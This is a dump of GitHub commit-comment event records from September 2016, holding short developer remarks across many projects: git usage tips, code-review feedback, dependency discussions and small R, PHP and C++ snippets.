{"id":"4513392406","type":"CommitCommentEvent","actor":{"login":"vitalyperminov"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18892399,"position":15,"line":15,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-04T08:16:42Z","updated_at":"2016-09-04T08:16:42Z","body":"А как ты это загрузил, через веб-интерфейс что-ли?\r\nНужно с помощью гита грузить.\r\nУстанавливаешь git, делаешь `git init` внутри папки с проектом, указываешь удаленный репозиторий. Потом `git add .`, потом `git push origin <branch name>`\r\n[https://git-scm.com/book/ru/v1](Pro git)"}},"created_at":"2016-09-04T08:16:42Z"}
{"id":"4513394944","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"redaxo/redaxo4"},"payload":{"comment":{"id":18892401,"position":null,"line":null,"path":null,"commit_id":"b1d9c9dd610e012c9a0bc9875002c1756c6e916a","created_at":"2016-09-04T08:19:06Z","updated_at":"2016-09-04T08:19:06Z","body":"^ @gharlan @dergel "}},"created_at":"2016-09-04T08:19:06Z"}
{"id":"4513394947","type":"CommitCommentEvent","actor":{"login":"vitalyperminov"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18892402,"position":141,"line":141,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-04T08:19:06Z","updated_at":"2016-09-04T08:19:06Z","body":"Ну если так в примере, то ок. Оставь. Я бы уже просто подключил `jQuery` тогда как\r\n`<script src=\"docs/assets/js/vendor/jquery.min.js\"><\\/script>`\r\nвместо этих двух строк"}},"created_at":"2016-09-04T08:19:06Z"}
{"id":"4513396236","type":"CommitCommentEvent","actor":{"login":"chugaoshun123"},"repo":{"name":"clocle/clocle"},"payload":{"comment":{"id":18892403,"position":null,"line":null,"path":null,"commit_id":"59180ec17e2b51d0d370de6787f407f26a3e126e","created_at":"2016-09-04T08:20:23Z","updated_at":"2016-09-04T08:20:23Z","body":"111"}},"created_at":"2016-09-04T08:20:23Z"}
{"id":"4513397462","type":"CommitCommentEvent","actor":{"login":"lovelywenjing"},"repo":{"name":"lovelywenjing/huawei"},"payload":{"comment":{"id":18892404,"position":null,"line":null,"path":null,"commit_id":"23ff0670b00e8c3b896c9610b3ccbad0919154c3","created_at":"2016-09-04T08:21:32Z","updated_at":"2016-09-04T08:21:32Z","body":"this is mainly the practice of Huawei online tests."}},"created_at":"2016-09-04T08:21:32Z"}
{"id":"4513398424","type":"CommitCommentEvent","actor":{"login":"squeek502"},"repo":{"name":"squeek502/VeganOption"},"payload":{"comment":{"id":18892406,"position":null,"line":null,"path":null,"commit_id":"07d17e9389bf4f1bb27dde9337ab780cf21c310a","created_at":"2016-09-04T08:22:32Z","updated_at":"2016-09-04T08:22:32Z","body":"I don't see why it shouldn't be saved to disk, though, as saving it to disk allows it to be reloaded without having to do any recalculating of its state. If we make IS_OPEN truly transient, then on every load it'd have to re-check isPowered and subsequently notify its neighbors, which doesn't seem ideal."}},"created_at":"2016-09-04T08:22:32Z"}
{"id":"4513398920","type":"CommitCommentEvent","actor":{"login":"Yoshida-Akiho"},"repo":{"name":"Yoshida-Akiho/ToDoList"},"payload":{"comment":{"id":18892408,"position":null,"line":null,"path":null,"commit_id":"41d43c568bc7278c19ac0f177e751c1385295539","created_at":"2016-09-04T08:23:00Z","updated_at":"2016-09-04T08:23:00Z","body":"課題提出完了(仮)\r\nhttps://obscure-shelf-36944.herokuapp.com/tasks"}},"created_at":"2016-09-04T08:23:00Z"}
{"id":"4513398925","type":"CommitCommentEvent","actor":{"login":"Miigon"},"repo":{"name":"Infinideastudio/NEWorld"},"payload":{"comment":{"id":18892409,"position":null,"line":null,"path":null,"commit_id":"2007a875507cc89d9f44e79cc6570af9d991c935","created_at":"2016-09-04T08:23:00Z","updated_at":"2016-09-04T08:23:00Z","body":"@abc612008 改下VS的目标文件名吧"}},"created_at":"2016-09-04T08:23:00Z"}
{"id":"4513399235","type":"CommitCommentEvent","actor":{"login":"maeda-naho"},"repo":{"name":"maeda-naho/ToDoList"},"payload":{"comment":{"id":18892411,"position":null,"line":null,"path":null,"commit_id":"451dfaaf3a601410f9b9e1644e3707ff9cce7965","created_at":"2016-09-04T08:23:21Z","updated_at":"2016-09-04T08:23:21Z","body":"課題提出完了(仮)\r\nhttps://enigmatic-eyrie-81518.herokuapp.com/tasks"}},"created_at":"2016-09-04T08:23:21Z"}
{"id":"4513399315","type":"CommitCommentEvent","actor":{"login":"mstembera"},"repo":{"name":"mstembera/Stockfish"},"payload":{"comment":{"id":18892412,"position":null,"line":null,"path":null,"commit_id":"ffe997752b006031cad9f838733d60b3eb070bcb","created_at":"2016-09-04T08:23:28Z","updated_at":"2016-09-04T08:23:28Z","body":"Thanks for your comments!  However, the test failed \r\nhttp://tests.stockfishchess.org/tests/view/57cb6c2c0ebc59030fbe4e43\r\nand I currently don't have any good ideas on how to go forward so most likely it ends here."}},"created_at":"2016-09-04T08:23:28Z"}
{"id":"4513399425","type":"CommitCommentEvent","actor":{"login":"Caduseus"},"repo":{"name":"Caduseus/travel-site"},"payload":{"comment":{"id":18892413,"position":5,"line":7,"path":"app/index.html","commit_id":"bb1034d6422721019ac9a742149b41da4bf61c57","created_at":"2016-09-04T08:23:34Z","updated_at":"2016-09-04T08:23:34Z","body":"Mitä vittua!"}},"created_at":"2016-09-04T08:23:34Z"}
{"id":"4513399663","type":"CommitCommentEvent","actor":{"login":"Caduseus"},"repo":{"name":"Caduseus/travel-site"},"payload":{"comment":{"id":18892414,"position":5,"line":7,"path":"app/index.html","commit_id":"bb1034d6422721019ac9a742149b41da4bf61c57","created_at":"2016-09-04T08:23:49Z","updated_at":"2016-09-04T08:23:49Z","body":"?"}},"created_at":"2016-09-04T08:23:49Z"}
{"id":"4513400951","type":"CommitCommentEvent","actor":{"login":"yoshikawa-mikako"},"repo":{"name":"yoshikawa-mikako/ToDoList"},"payload":{"comment":{"id":18892416,"position":null,"line":null,"path":null,"commit_id":"ddbc66a12dfca56e2ed89e49d9eca4a489f831b3","created_at":"2016-09-04T08:24:57Z","updated_at":"2016-09-04T08:24:57Z","body":"課題提出完了(仮)\r\nherokuアドレス：https://fierce-eyrie-84987.herokuapp.com/tasks"}},"created_at":"2016-09-04T08:24:57Z"}
{"id":"4513401460","type":"CommitCommentEvent","actor":{"login":"legoboy0215"},"repo":{"name":"legoboy0215/BulkAnvil2Mcregion"},"payload":{"comment":{"id":18892418,"position":null,"line":null,"path":null,"commit_id":"666f0d4b84894ec68d658c0b0a49be5f54365a95","created_at":"2016-09-04T08:25:22Z","updated_at":"2016-09-04T08:25:22Z","body":"Just run it once, end it, put all worlds in the generated folder called 'world'."}},"created_at":"2016-09-04T08:25:22Z"}
{"id":"4513402588","type":"CommitCommentEvent","actor":{"login":"mscherer"},"repo":{"name":"ansible/ansible-modules-core"},"payload":{"comment":{"id":18892419,"position":5,"line":237,"path":"system/mount.py","commit_id":"5f1d6ded7faae2d501e851094834b0581b2dac37","created_at":"2016-09-04T08:26:25Z","updated_at":"2016-09-04T08:26:25Z","body":"It was already reported: https://github.com/ansible/ansible-modules-core/issues/3153 and there is already a PR waiting:  https://github.com/ansible/ansible-modules-core/pull/4642 "}},"created_at":"2016-09-04T08:26:25Z"}
{"id":"4513403245","type":"CommitCommentEvent","actor":{"login":"nyalldawson"},"repo":{"name":"fritsvanveen/QGIS"},"payload":{"comment":{"id":18892420,"position":null,"line":null,"path":null,"commit_id":"eb0eb126be659c9aa5d1ecbde5ab499dfb494543","created_at":"2016-09-04T08:27:04Z","updated_at":"2016-09-04T08:27:04Z","body":"It can be useful when debugging to turn on\"show label candidates\" under the global label settings (the \"arrows\" button on the top right of label settings). Candidates with collisions are shared in red."}},"created_at":"2016-09-04T08:27:04Z"}
{"id":"4513403278","type":"CommitCommentEvent","actor":{"login":"NicoHood"},"repo":{"name":"limpkin/mooltipass"},"payload":{"comment":{"id":18892421,"position":3,"line":3,"path":"tools/_python_framework/_install_reqs.sh","commit_id":"fe87450d7725f270f4cc290b9bf32e6eeb2467ed","created_at":"2016-09-04T08:27:06Z","updated_at":"2016-09-04T08:27:06Z","body":"Using sudo in scripts is a really bad idea. Using sudo for pip even more. You can use pip without admin privilegs. This will not completely mess up your filesystem and only install it locally.\r\n\r\nHowever I do not think a script is required for those 3 lines as you do this only once. I've never seen one writing such scripts. In the end you want to create a debian package which describes all this dependencies. However that can be done once the tools is near a final release. I can package an AUR packet when its ready. For debian I ahve to read up on this."}},"created_at":"2016-09-04T08:27:06Z"}
{"id":"4513405816","type":"CommitCommentEvent","actor":{"login":"neobuddy89"},"repo":{"name":"CyanogenMod/android_hardware_qcom_media"},"payload":{"comment":{"id":18892422,"position":5,"line":47,"path":"msm8996/videopp/Android.mk","commit_id":"60aacc9ba9105193c67873ae52584d02a0ca84dd","created_at":"2016-09-04T08:29:20Z","updated_at":"2016-09-04T08:29:20Z","body":"Derp?"}},"created_at":"2016-09-04T08:29:20Z"}
{"id":"4513406857","type":"CommitCommentEvent","actor":{"login":"schwabe"},"repo":{"name":"opentx/opentx"},"payload":{"comment":{"id":18892423,"position":null,"line":null,"path":null,"commit_id":"ba74f3e61c17df9d96d7f237ff7e2986a2d6ccde","created_at":"2016-09-04T08:30:11Z","updated_at":"2016-09-04T08:30:11Z","body":"Thanks! That fixes external power for me."}},"created_at":"2016-09-04T08:30:11Z"}
{"id":"4513409629","type":"CommitCommentEvent","actor":{"login":"NicoHood"},"repo":{"name":"limpkin/mooltipass"},"payload":{"comment":{"id":18892425,"position":5,"line":35,"path":"tools/_python_framework/Readme.md","commit_id":"fe87450d7725f270f4cc290b9bf32e6eeb2467ed","created_at":"2016-09-04T08:32:44Z","updated_at":"2016-09-04T08:32:44Z","body":"Using -y for a user inititated install is also a not very friendly. Maybe you want to check the dependencies and *boom* it just installs. In the script its fine, but not in the readme. Its a dev tool which you only install once. No need to hurry.\r\n\r\nAnd why didnt you add `seccure` to requirements.txt?"}},"created_at":"2016-09-04T08:32:44Z"}
{"id":"4513409737","type":"CommitCommentEvent","actor":{"login":"DimStar77"},"repo":{"name":"os-autoinst/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":18892427,"position":null,"line":null,"path":null,"commit_id":"ae987875aa3ecdb9fed31ee859c930550e692b4f","created_at":"2016-09-04T08:32:51Z","updated_at":"2016-09-04T08:32:51Z","body":"What should this needle contain? should I get a needle which shows the absence of a warning?\r\n\r\nCurrenty, it seems all stagings are blocked on this:\r\nhttps://openqa.opensuse.org/tests/254814#step/installation_overview/3\r\n\r\nand as it's not clear what the needle should contain I refrain from creating one for now."}},"created_at":"2016-09-04T08:32:51Z"}
{"id":"4513411384","type":"CommitCommentEvent","actor":{"login":"fritsvanveen"},"repo":{"name":"fritsvanveen/QGIS"},"payload":{"comment":{"id":18892430,"position":null,"line":null,"path":null,"commit_id":"eb0eb126be659c9aa5d1ecbde5ab499dfb494543","created_at":"2016-09-04T08:34:19Z","updated_at":"2016-09-04T08:34:19Z","body":"@nyalldawson Nothing is showing in red. Still 'Zuid-Holland' is not plotted.\r\n![2016-09-04 10_33_11-qgis 2 99 0 - test grenzend](https://cloud.githubusercontent.com/assets/20473145/18229917/09a9d2f8-728b-11e6-9a5b-dd0fc3a6a542.png)\r\n"}},"created_at":"2016-09-04T08:34:19Z"}
{"id":"4513412636","type":"CommitCommentEvent","actor":{"login":"zju3351689"},"repo":{"name":"zju3351689/testgit"},"payload":{"comment":{"id":18892432,"position":null,"line":null,"path":null,"commit_id":"30da520c597b1d40a817116a403dc52912e05b6d","created_at":"2016-09-04T08:35:25Z","updated_at":"2016-09-04T08:35:25Z","body":"### release v.1.0.0\r\n-----\r\njust for test"}},"created_at":"2016-09-04T08:35:25Z"}
{"id":"4513413287","type":"CommitCommentEvent","actor":{"login":"philmmanjaro"},"repo":{"name":"manjaro/desktop-settings"},"payload":{"comment":{"id":18892433,"position":null,"line":null,"path":null,"commit_id":"cbb654d98a97de577ef6afcfb85bde2fe2e761da","created_at":"2016-09-04T08:36:02Z","updated_at":"2016-09-04T08:36:02Z","body":"Sure, why not. go for it."}},"created_at":"2016-09-04T08:36:02Z"}
{"id":"4513414847","type":"CommitCommentEvent","actor":{"login":"Slegan"},"repo":{"name":"Slegan/VW"},"payload":{"comment":{"id":18892434,"position":15,"line":15,"path":"index.html","commit_id":"5f2a63ed8d5abfdcaca04fb7686cc4959c77095d","created_at":"2016-09-04T08:37:36Z","updated_at":"2016-09-04T08:37:36Z","body":"Дома и наработе устанавлю, а то я счас в баранках\r\n"}},"created_at":"2016-09-04T08:37:36Z"}
{"id":"4513416175","type":"CommitCommentEvent","actor":{"login":"NoctuaNivalis"},"repo":{"name":"ZeusWPI/zeus.ugent.be"},"payload":{"comment":{"id":18892437,"position":null,"line":null,"path":null,"commit_id":"6b5bb351c13a4424e71cb8f32f67e272d75a7990","created_at":"2016-09-04T08:38:50Z","updated_at":"2016-09-04T08:38:50Z","body":"Shame! :bell: "}},"created_at":"2016-09-04T08:38:50Z"}
{"id":"4513419419","type":"CommitCommentEvent","actor":{"login":"dolphin1414"},"repo":{"name":"dolphin1414/TestRepository"},"payload":{"comment":{"id":18892439,"position":null,"line":null,"path":null,"commit_id":"e82e31452faf72f9e4cd357dc245ff847a60a22d","created_at":"2016-09-04T08:41:50Z","updated_at":"2016-09-04T08:41:50Z","body":"ok"}},"created_at":"2016-09-04T08:41:50Z"}
{"id":"4513419717","type":"CommitCommentEvent","actor":{"login":"sysrich"},"repo":{"name":"os-autoinst/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":18892440,"position":null,"line":null,"path":null,"commit_id":"ae987875aa3ecdb9fed31ee859c930550e692b4f","created_at":"2016-09-04T08:42:09Z","updated_at":"2016-09-04T08:42:09Z","body":"Staging shouldn't be hitting it, should only be used when doing a low space upgrade test..staging isn't a low space upgrade test"}},"created_at":"2016-09-04T08:42:09Z"}
{"id":"4513419961","type":"CommitCommentEvent","actor":{"login":"finanalyst"},"repo":{"name":"perl6/gtk-simple"},"payload":{"comment":{"id":18892441,"position":null,"line":null,"path":null,"commit_id":"8a6d92ac2a99fb742d3e5b9656632c7dd0f485ab","created_at":"2016-09-04T08:42:21Z","updated_at":"2016-09-04T08:42:21Z","body":"These changes cause a download of all the dll files when installing, but on Ubuntu, I don't need them.\r\nCan the download be made conditional on the Operating System, please."}},"created_at":"2016-09-04T08:42:21Z"}
{"id":"4513421581","type":"CommitCommentEvent","actor":{"login":"pjlsergeant"},"repo":{"name":"pjlsergeant/test-bdd-cucumber-perl"},"payload":{"comment":{"id":18892445,"position":null,"line":null,"path":null,"commit_id":"13448345480bdbbc02967433d44c001846afb26c","created_at":"2016-09-04T08:43:51Z","updated_at":"2016-09-04T08:43:51Z","body":"@ylavoie @ehuelsmann Pass-through should now work"}},"created_at":"2016-09-04T08:43:51Z"}
{"id":"4513429780","type":"CommitCommentEvent","actor":{"login":"wschweer"},"repo":{"name":"musescore/MuseScore"},"payload":{"comment":{"id":18892456,"position":6,"line":74,"path":"libmscore/mscore.h","commit_id":"4ac407d90ec1d5663f0c753acc3ef5f4bcca2422","created_at":"2016-09-04T08:51:16Z","updated_at":"2016-09-04T08:51:16Z","body":"The change to use setPoingSizeF(qreal) instead of setPixelSize(int) has some impact on drawing and might need more changes to code parts i did not tested yet."}},"created_at":"2016-09-04T08:51:16Z"}
{"id":"4513430010","type":"CommitCommentEvent","actor":{"login":"MonalisaSamal16"},"repo":{"name":"MonalisaSamal16/test1"},"payload":{"comment":{"id":18892457,"position":1,"line":1,"path":"cachematrix.R","commit_id":"27987823fcf81d46a5e2186391addd87c079b879","created_at":"2016-09-04T08:51:30Z","updated_at":"2016-09-04T08:51:30Z","body":"## makeCacheMatrix: This function creates a special \"matrix\" object that can cache its inverse.\r\n## I create makeCacheMatrix as a list containing a function for the following activities\r\n## 1 First set the value of a matrix\r\n## 2 Second get the value of the matrix\r\n## 3 Alternatively setting next the value of inverse of the matrix\r\n## 4 and last is get the value of inverse of the matrix\r\n"}},"created_at":"2016-09-04T08:51:30Z"}
{"id":"4513430960","type":"CommitCommentEvent","actor":{"login":"deveee"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":18892459,"position":null,"line":null,"path":null,"commit_id":"78baaff23e51b194e33cbed38b29605186335b34","created_at":"2016-09-04T08:52:25Z","updated_at":"2016-09-04T08:52:25Z","body":"I thought it was already checked few lines below:\r\n```\r\n    if (!ProfileWorld::isNoGraphics() && recreate_device)\r\n{\r\n...\r\n```"}},"created_at":"2016-09-04T08:52:25Z"}
{"id":"4513432214","type":"CommitCommentEvent","actor":{"login":"MonalisaSamal16"},"repo":{"name":"MonalisaSamal16/test1"},"payload":{"comment":{"id":18892460,"position":1,"line":1,"path":"cachematrix.R","commit_id":"27987823fcf81d46a5e2186391addd87c079b879","created_at":"2016-09-04T08:53:27Z","updated_at":"2016-09-04T08:53:27Z","body":"### ## makeCacheMatrix: This function creates a special \"matrix\" object that can cache its inverse.\r\n## I create makeCacheMatrix as a list containing a function for the following activities\r\n## 1 First set the value of a matrix\r\n## 2 Second get the value of the matrix\r\n## 3 Alternatively setting next the value of inverse of the matrix\r\n## 4 and last is get the value of inverse of the matrix### "}},"created_at":"2016-09-04T08:53:27Z"}
{"id":"4513432561","type":"CommitCommentEvent","actor":{"login":"ophian"},"repo":{"name":"smarty-php/smarty"},"payload":{"comment":{"id":18892461,"position":null,"line":null,"path":null,"commit_id":"e1d27d68d77eb32f3d6daeecc6831d6eabe171d0","created_at":"2016-09-04T08:53:48Z","updated_at":"2016-09-04T08:53:48Z","body":"Hi @uwetews \r\nMay I ask a question, please? I have read the issue https://github.com/smarty-php/smarty/issues/280\r\nThis commit really makes me wonder. Isn't `require_once` or include_once a language constructs used to check if already bound in...? (Which may internally use something like is_callable too.) If so, is checking for foo and/or `is_callable()` significant faster, since it does not reduce the run call check itself?\r\n``` php\r\n    if (foo && !is_callable('smarty_boobar')) {\r\n        require_once(SMARTY_PLUGINS_DIR . 'shared.foobar.php');\r\n    }\r\n```"}},"created_at":"2016-09-04T08:53:48Z"}
{"id":"4513432841","type":"CommitCommentEvent","actor":{"login":"MonalisaSamal16"},"repo":{"name":"MonalisaSamal16/test1"},"payload":{"comment":{"id":18892462,"position":4,"line":4,"path":"cachematrix.R","commit_id":"27987823fcf81d46a5e2186391addd87c079b879","created_at":"2016-09-04T08:54:06Z","updated_at":"2016-09-04T08:54:06Z","body":"inverse1 <- NULL\r\n  set <- function(n) {\r\n    x <<- n\r\n    inverse1 <<- NULL\r\n  }\r\n  get <- function() x\r\n  \r\n  setInversefun <- function(inverse) inverse1 <<- inverse\r\n  getInversefun <- function()inverse1\r\n  list( set = set, get = get, setInversefun=setInversefun, getInversefun=getInversefun)\r\n"}},"created_at":"2016-09-04T08:54:06Z"}
{"id":"4513433473","type":"CommitCommentEvent","actor":{"login":"MonalisaSamal16"},"repo":{"name":"MonalisaSamal16/test1"},"payload":{"comment":{"id":18892464,"position":10,"line":10,"path":"cachematrix.R","commit_id":"27987823fcf81d46a5e2186391addd87c079b879","created_at":"2016-09-04T08:54:44Z","updated_at":"2016-09-04T08:54:44Z","body":"inverse1 <- x$getInversefun()\r\n  if (!is.null(inverse1)){\r\n    message(\"get cache data\")\r\n    return(inverse1)\r\n  }\r\n  matrixnew <- x$get()\r\n  inverse1 <- solve(matrixnew, ...)\r\n  x$setInversefun(inverse1)\r\n  inverse1"}},"created_at":"2016-09-04T08:54:44Z"}
{"id":"4513433900","type":"CommitCommentEvent","actor":{"login":"MonalisaSamal16"},"repo":{"name":"MonalisaSamal16/test1"},"payload":{"comment":{"id":18892465,"position":9,"line":9,"path":"cachematrix.R","commit_id":"27987823fcf81d46a5e2186391addd87c079b879","created_at":"2016-09-04T08:55:02Z","updated_at":"2016-09-04T08:55:02Z","body":"inverse1 <- x$getInversefun()\r\n  if (!is.null(inverse1)){\r\n    message(\"get cache data\")\r\n    return(inverse1)\r\n  }\r\n  matrixnew <- x$get()\r\n  inverse1 <- solve(matrixnew, ...)\r\n  x$setInversefun(inverse1)\r\n  inverse1"}},"created_at":"2016-09-04T08:55:02Z"}
{"id":"4513434629","type":"CommitCommentEvent","actor":{"login":"MonalisaSamal16"},"repo":{"name":"MonalisaSamal16/test1"},"payload":{"comment":{"id":18892466,"position":2,"line":2,"path":"cachematrix.R","commit_id":"27987823fcf81d46a5e2186391addd87c079b879","created_at":"2016-09-04T08:55:42Z","updated_at":"2016-09-04T08:55:42Z","body":"### ##cacheSolve: This function computes the inverse of the special \"matrix\" returned by makeCacheMatrix above. \r\n##If the inverse has already been calculated (and the matrix has not changed), \r\n##then the cachesolve should retrieve the inverse from the cache.\r\n"}},"created_at":"2016-09-04T08:55:42Z"}
{"id":"4513435603","type":"CommitCommentEvent","actor":{"login":"PsiOmegaDelta"},"repo":{"name":"PolarisSS13/Polaris"},"payload":{"comment":{"id":18892467,"position":4,"line":14,"path":"code/game/objects/random/random.dm","commit_id":"f75d509e7fe8e364d5db5782a3dd1ced183a1dfd","created_at":"2016-09-04T08:56:28Z","updated_at":"2016-09-04T08:56:28Z","body":"On Bay/Polaris code initialize() is called last by the base New() proc, if it's after round start."}},"created_at":"2016-09-04T08:56:28Z"}
{"id":"4513435742","type":"CommitCommentEvent","actor":{"login":"zuphilip"},"repo":{"name":"zotero/translation-server"},"payload":{"comment":{"id":18892468,"position":null,"line":null,"path":null,"commit_id":"c6ddee54904ac096d1e3b4c84405641a3b64429a","created_at":"2016-09-04T08:56:35Z","updated_at":"2016-09-04T08:56:35Z","body":"The current [image on dockerhub](https://hub.docker.com/r/zotero/translation-server/tags/) says that it is 144 MB, which is the same same size as the one I have created 6 days ago on [my dockerhub profile](https://hub.docker.com/r/zuphilip/translation-server/tags/).\r\n\r\nIMO it is useful to activate automatic buildings on every commit of translation-server. You can still then decide when you want to run `docker pull` on your production server for testing. Besides the advantages of an automatism for the build, a lot of information are automatically there, e.g. the complete log file https://hub.docker.com/r/zuphilip/translation-server/builds/b6tp6wvdzpme2p83xu5be2a/ and description info."}},"created_at":"2016-09-04T08:56:35Z"}
{"id":"4513436121","type":"CommitCommentEvent","actor":{"login":"azawawi"},"repo":{"name":"perl6/gtk-simple"},"payload":{"comment":{"id":18892469,"position":null,"line":null,"path":null,"commit_id":"8a6d92ac2a99fb742d3e5b9656632c7dd0f485ab","created_at":"2016-09-04T08:56:58Z","updated_at":"2016-09-04T08:56:58Z","body":"Thanks for catching this. This is being tested on https://ci.appveyor.com/project/azawawi/gtk-simple/build/1.0.66/job/3w4co00lqltmnafq and https://travis-ci.org/azawawi/gtk-simple/jobs/157417594."}},"created_at":"2016-09-04T08:56:58Z"}
{"id":"4513437384","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18892473,"position":31,"line":34,"path":"band-service/src/main/java/hu/schonherz/training/band/service/impl/DemoServiceImpl.java","commit_id":"aace04f0fcbf6a2c441a9de7d4a5e881290df48a","created_at":"2016-09-04T08:58:10Z","updated_at":"2016-09-04T08:58:10Z","body":"This could be condensed to one line."}},"created_at":"2016-09-04T08:58:10Z"}
{"id":"4513438559","type":"CommitCommentEvent","actor":{"login":"k-plan"},"repo":{"name":"Fourdee/DietPi"},"payload":{"comment":{"id":18892474,"position":null,"line":null,"path":null,"commit_id":"ea18f3265c4b3fb65bf73afee8ab1337d939b005","created_at":"2016-09-04T08:59:13Z","updated_at":"2016-09-04T08:59:13Z","body":"> DietPi-Software | Pi-hole | Installation updated to latest version 2.8.1\r\n\r\nPi-Hole V2.9 - [2016-08-30] is out.\r\n\r\nhttps://github.com/pi-hole/pi-hole/releases\r\n\r\nhttps://github.com/pi-hole/pi-hole/wiki/Changelog#29---2016-08-30"}},"created_at":"2016-09-04T08:59:13Z"}
{"id":"4513438693","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18892475,"position":39,"line":40,"path":"band-service/src/main/java/hu/schonherz/training/band/service/impl/DemoServiceImpl.java","commit_id":"aace04f0fcbf6a2c441a9de7d4a5e881290df48a","created_at":"2016-09-04T08:59:19Z","updated_at":"2016-09-04T08:59:19Z","body":"Service methods should receive service domain objects as parameters, not entities."}},"created_at":"2016-09-04T08:59:19Z"}
{"id":"4513438999","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18892476,"position":40,"line":41,"path":"band-service/src/main/java/hu/schonherz/training/band/service/impl/DemoServiceImpl.java","commit_id":"aace04f0fcbf6a2c441a9de7d4a5e881290df48a","created_at":"2016-09-04T08:59:35Z","updated_at":"2016-09-04T08:59:35Z","body":"This method could be condensed to one line."}},"created_at":"2016-09-04T08:59:35Z"}
{"id":"4513441358","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":18892478,"position":16,"line":13,"path":"band-service/src/main/java/hu/schonherz/training/band/vo/DemoVo.java","commit_id":"733fcb64e2882e6714add66827d457b3775bf9c8","created_at":"2016-09-04T09:01:26Z","updated_at":"2016-09-04T09:01:26Z","body":"In this case, using a primitive bandId field could be more useful than storing a whole object."}},"created_at":"2016-09-04T09:01:26Z"}
{"id":"4513441698","type":"CommitCommentEvent","actor":{"login":"oberon2007"},"repo":{"name":"manjaro/desktop-settings"},"payload":{"comment":{"id":18892479,"position":null,"line":null,"path":null,"commit_id":"cbb654d98a97de577ef6afcfb85bde2fe2e761da","created_at":"2016-09-04T09:01:45Z","updated_at":"2016-09-04T09:01:45Z","body":"Well, the question is still how to deal with the common files... Are we moving them to 'shared' then?"}},"created_at":"2016-09-04T09:01:45Z"}
{"id":"4513442592","type":"CommitCommentEvent","actor":{"login":"elifoster"},"repo":{"name":"squeek502/VeganOption"},"payload":{"comment":{"id":18892480,"position":null,"line":null,"path":null,"commit_id":"07d17e9389bf4f1bb27dde9337ab780cf21c310a","created_at":"2016-09-04T09:02:28Z","updated_at":"2016-09-04T09:02:28Z","body":"Fair point 👍"}},"created_at":"2016-09-04T09:02:28Z"}
{"id":"4513443171","type":"CommitCommentEvent","actor":{"login":"Benau"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":18892481,"position":null,"line":null,"path":null,"commit_id":"78baaff23e51b194e33cbed38b29605186335b34","created_at":"2016-09-04T09:02:59Z","updated_at":"2016-09-04T09:02:59Z","body":"Because graphicsrestriction::init is not called in cvs->init() above if profiling"}},"created_at":"2016-09-04T09:02:59Z"}
{"id":"4513444034","type":"CommitCommentEvent","actor":{"login":"KevinW1998"},"repo":{"name":"Wohlhabend-Networks/PGE-Project"},"payload":{"comment":{"id":18892482,"position":null,"line":null,"path":null,"commit_id":"f54557caf9e846c87810cb5ae462c63c7a4a22b6","created_at":"2016-09-04T09:03:49Z","updated_at":"2016-09-04T09:03:49Z","body":"It's faster to use std::vector<std::pair<double, QList<...>>> and std::stable_sort than using a map"}},"created_at":"2016-09-04T09:03:49Z"}
{"id":"4513447077","type":"CommitCommentEvent","actor":{"login":"ppoffice"},"repo":{"name":"ppoffice/hexo-theme-icarus"},"payload":{"comment":{"id":18892484,"position":null,"line":null,"path":null,"commit_id":"8b818d06acb0e380d486ba2e6dcaa0dfcf755bce","created_at":"2016-09-04T09:06:48Z","updated_at":"2016-09-04T09:06:48Z","body":"#186 "}},"created_at":"2016-09-04T09:06:48Z"}
{"id":"4513447681","type":"CommitCommentEvent","actor":{"login":"ditunes"},"repo":{"name":"ditunes/TddKata"},"payload":{"comment":{"id":18892485,"position":null,"line":null,"path":null,"commit_id":"04611a16951a020a116ec2e3c30861b0c5b303b5","created_at":"2016-09-04T09:07:22Z","updated_at":"2016-09-04T09:07:22Z","body":"khkhjhjjjh"}},"created_at":"2016-09-04T09:07:22Z"}
{"id":"4513454013","type":"CommitCommentEvent","actor":{"login":"FireWalkerX"},"repo":{"name":"Crowndev/crowncoin"},"payload":{"comment":{"id":18892493,"position":5,"line":173,"path":"src/miner.cpp","commit_id":"50d89c9c7a7aa5b49e7a62ccae765b965eda815a","created_at":"2016-09-04T09:13:16Z","updated_at":"2016-09-04T09:13:16Z","body":"doesnt work reverting\r\n"}},"created_at":"2016-09-04T09:13:16Z"}
{"id":"4513455130","type":"CommitCommentEvent","actor":{"login":"Shnoulle"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":18892495,"position":10,"line":80,"path":"application/helpers/qanda_helper.php","commit_id":"3c4c4dc6e9ca75cd357b6186d16d8c36adfd3e4a","created_at":"2016-09-04T09:14:26Z","updated_at":"2016-09-04T09:14:26Z","body":"I think $answer is {ANSWERS} : https://github.com/LimeSurvey/LimeSurvey/blob/master/application/helpers/SurveyRuntimeHelper.php#L1561\r\n\r\nIn this function, i search all parts (but don't do a god phpdoc  :innocent:  )\r\n\r\nAre you sure for $qanda[0] ? I think it's another array : https://github.com/LimeSurvey/LimeSurvey/blob/master/application/helpers/SurveyRuntimeHelper.php#L1562\r\n\r\nBut maybe qanda is not always the same ....  :weary:"}},"created_at":"2016-09-04T09:14:26Z"}
